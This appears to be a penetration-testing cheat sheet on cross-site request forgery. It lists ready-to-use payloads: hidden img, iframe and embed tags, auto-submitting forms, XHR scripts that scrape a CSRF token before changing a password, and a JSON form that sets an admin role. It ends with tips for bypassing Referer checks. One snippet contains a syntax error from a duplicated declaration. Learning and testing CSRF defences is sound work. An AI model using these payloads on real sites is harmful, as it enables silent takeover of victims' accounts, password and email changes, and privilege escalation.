Cross Site Request Forgery (CSRF)
What is CSRF Attack?
In a successful CSRF attack, the attacker causes the victim user to carry out an action unintentionally. For example, this might be to change the email address on their account, to change their password, or to make a funds transfer. Depending on the nature of the action, the attacker might be able to gain full control over the user's account. If the compromised user has a privileged role within the application, then the attacker might be able to take full control of all the application's data and functionality.
CSRF (GET Method)
Example URLs
http://target-vuln-web.com/email/[email protected]
http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass
Exploits
Exploit with HTML tag a
<a href="http://target-vuln-web.com/email/[email protected]">Click me</a>
<a href="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass">Click me</a>
Exploit with HTML tag img
<img style="display:none;" src="http://target-vuln-web.com/email/[email protected]">
<img style="display:none;" src="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass">
Exploit with HTML tag iframe
<iframe src="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass" style="display:none"></iframe>
Exploit with HTML tag embed
<embed type="image/jpg" src="http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass" style="display:none;">
CSRF (POST Method)
Example requests
POST /email/change HTTP/1.1
Host: target-vuln-web.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=cookievalues
[email protected]
POST /user/new_password HTTP/1.1
Host: target-vuln-web.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=cookievalues
password=newpass&comfirm_password=newpass
Exploits
Form + Script Tag (Without Token)
<form id="csrf" action="http://target-vuln-web.com/user/new_password" method="POST">
<input type="hidden" name="password" value="newpass" />
<input type="hidden" name="comfirm_password" value="newpass" />
</form>
<script>
document.forms['csrf'].submit();
</script>
Form + Script Tag (With Token)
<form action="http://target-vuln-web.com/user/new_password" method="POST">
<input type="hidden" name="password" value="newpass" />
<input type="hidden" name="comfirm_password" value="newpass" />
<input type="hidden" name="token" value="tokenishere" />
</form>
<script>
document.forms[0].submit();
</script>
Exploit CSRF Vulnerability Via XSS (GET Method)
Whithout token
<script>
const HttpRequest = new XMLHttpRequest();
const url=const url = 'http://target-vuln-web.com/user/new_password?password=newpass&comfirm_password=newpass'
;
HttpRequest.open("GET", url);
HttpRequest.send();
</script>
With token
<body onload="change_password()">
<script>
function change_password(){
const request = new XMLHttpRequest();
const url = "http://localhost:80/vulnerabilities/csrf/"
request.open("GET", url);
request.onreadystatechange = () => {
if (request.readyState === request.DONE && request.status === 200) {
var response = request.responseText;
var user_token = /[a-f0-9]{32}/g.exec(response)[0]
var payload = "http://localhost:80/vulnerabilities/csrf/?password_new=newpass&password_conf=newpass&Change=Change&user_token="+user_token;
var second_request = new XMLHttpRequest();
second_request.open("GET", payload);
second_request.send()
}
};
request.send()
}
</script>
</body>
JSON POST
<form id="csrf" action="http://target-vuln-web.com/user/update" enctype="text/plain" method="POST">
<input type="hidden" name='{"role":"admin","uid":1337, "unknown":"' value='"}' />
</form>
<script>
document.getElementById("csrf").submit();
</script>
Tricks && Tips
- Sometime all user can use any csrf token.
- You can find CSRF in delete,enable,disable function pages.
- If you can upload HTML files you can byass Referfer header validation.
- If you can upload files with unusual extensions, you can continue with CSRF or XSS or another client side vulnerabilities.